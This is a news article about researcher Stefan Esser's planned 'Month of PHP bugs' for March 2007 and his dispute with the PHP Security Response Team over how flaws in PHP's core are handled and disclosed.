Stefan Esser's frustrations
with the PHP Security Response Team has boiled over into plans for "month of PHP bugs" project scheduled for March 2007.
Esser, widely regarded as an authority on PHP security issues, plans to make daily disclosures on buffer overflows, double free vulnerabilities and trivial bypass bugs in PHP's protection features as part of a wider goal "to make people and especially the PHP developers aware that bugs in PHP exist."
In an interview with SecurityFocus, the German researcher did not hide his disdain for the way PHP security issues are handled by the open-source group that maintains the Apache-backed project. "PHP has a very bad reputation when it comes to security, which is mostly caused by all the advisories about security holes in PHP applications," he declared, arguing that the situation is inflamed by the PHP Group's insistence on blaming programmers for insecure coding practices.
"Remote File Inclusions, vulnerabilities due to register_globals or other problems within the PHP engine (e.g. zend_hash_del_key_or_index bug) are fully to blame on the PHP language. Unfortunately this kind of thinking is not appreciated by the PHP developers and they continue to claim that PHP is not worse than other languages, and that only badly written PHP applications are the problem. The Month of PHP bugs will show however that a lot of bugs in PHP's own source code exist," Esser added.
Esser's flaw disclosure project will only release information on holes within the code shipped with the default distribution of PHP. "That means we will not disclose holes in extensions that only exist in PECL, while we are sure that those contain vulnerabilities, too. Most of the holes were previously disclosed to the vendor, but not all," he explained.
On some days in March, because of the volume of PHP bugs stockpiled, he said there will be more than one vulnerability disclosed.
"As a vulnerability reporter you feel kinda puzzled how people among the PHP Security Response Team can claim in public that they do not know about any security vulnerability in PHP, when you disclosed about 20 holes to them in the two weeks before. At this point you stop bothering whether anyone considers the disclosure of unreported vulnerabilities unethical. Additionally a few of the reported bugs have been known for years among the PHP developers and will most probably never be fixed," he argued.
The issue of PHP security has been on the front burner lately, driven mostly by a dramatic rise in exploitable flaws in PHP-based Web applications.